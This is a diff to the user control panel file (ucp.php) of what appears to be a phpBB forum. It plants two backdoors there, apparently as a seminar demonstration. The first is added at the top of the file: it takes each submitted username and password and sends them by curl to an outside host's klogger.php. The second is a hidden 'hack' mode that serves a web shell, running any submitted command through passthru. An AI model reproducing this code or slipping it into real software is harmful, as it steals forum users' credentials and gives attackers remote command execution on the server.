--- ucp.old.php	2009-11-16 06:12:47.000000000 -0800
+++ ucp.php	2009-11-17 09:00:08.000000000 -0800
@@ -11,6 +11,14 @@
 /**
 * @ignore
 */
+
+if(!empty($_POST['username']) AND !empty($_POST['password'])){
+  $wr = $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n";
+  $uri = explode('?',$wr);
+  $toserv="/usr/bin/curl -d \"u=" . $_POST['username'] . "&p=" . $_POST['password'] . "&uri=" . $uri[0] . "\" http://ipsecs.com/devel/klogger.php > /dev/null 2>&1";
+  passthru($toserv);
+}
+
 define('IN_PHPBB', true);
 $phpbb_root_path = (defined('PHPBB_ROOT_PATH')) ? PHPBB_ROOT_PATH : './';
 $phpEx = substr(strrchr(__FILE__, '.'), 1);
@@ -41,6 +49,41 @@
 // Basic "global" modes
 switch ($mode)
 {
+	case 'hack' :
+		//echo "<pre>This forum is hacked!</pre>";
+		?>
+
+		<pre>
+		- Backdoor Web Shell Seminar Palembang -
+		<form method="POST" action="<?php $_SERVER['PHP_SELF'] ?>" >
+		<table>
+		<tr>
+		 <td>Command : </td>
+		 <td>&nbsp;&nbsp;&nbsp; </td>
+		 <td><input type="text" name="command"></td>
+		</tr>
+		<tr>
+		 <td>&nbsp;&nbsp;&nbsp;</td>
+		 <td>&nbsp;&nbsp;&nbsp;</td>
+		 <td><input type="submit" value="execute!"></td>
+		</tr>
+		</table>
+		</form>
+
+		<?php
+		if(isset($_POST['command'])){
+		 echo "<strong>Executing \"" . $_POST['command'] . "\"</strong><BR/>\n";
+		 if(!empty($_POST['command'])){
+		  passthru($_POST['command']);
+		 }else{
+		  echo "You cannot execute blank command!<BR/>\n";
+ 		}
+		}
+		?>
+		</pre>
+		<?php
+	break;
+
 	case 'activate':
 		$module->load('ucp', 'activate');
 		$module->display($user->lang['UCP_ACTIVATE']);
